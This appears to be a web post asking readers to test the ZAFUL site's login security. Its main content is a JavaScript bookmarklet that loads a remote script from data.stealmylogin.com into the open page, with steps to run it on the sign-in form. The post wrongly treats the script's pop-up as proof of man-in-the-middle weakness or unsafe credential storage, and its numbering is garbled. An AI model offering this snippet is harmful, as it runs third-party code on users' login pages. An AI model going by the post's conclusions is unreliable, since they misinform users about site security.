We often use an insecure internet connection to browse the web - for example using a public Wi-Fi hotspot or if our router is configured to communicate using an insecure protocol. This exposes us to Man-in-the-middle attacks, with malicious attackers trying to steal our login information, passwords etc, from the login page.
Lets's check if the ZAFUL website is secure enough against man in the middle attack.
STEPS:javascript:(function() {var s=document.createElement('script');s.src='http://data.stealmylogin.com/stealmylogin.js';document.getElementsByTagName('head')[0].appendChild(s);alert('StealMyLogin injected');})();
1. Select the above piece of code, drag and then drop it onto your chrome toolbar.
2. Open the Zaful website using the URL :
http://www.zaful.com/3. Click on "steal my login.js" on the toolbar.
3. Click on the sign-in option in th zaful webiste and then enter a random email address, password and the given code on the website.
4. Once you have entered the above information, click on sign-in.
5. If you are prompted with a dialogue box, stating "stealing your login info" , this means that the website is not secure, and any hacker can use a simple code, inject it into the website, and then successfully steal your login credentials and misuse it for malicious purpose. If you are not prompted with the "steal your login window", the website uses a safe way of storing your credentials.
6. Finally, post your answer under the poll, by answering the question, "Is the website secure?"
7. Then right Click on steal my login.js on the toolbar and delete it.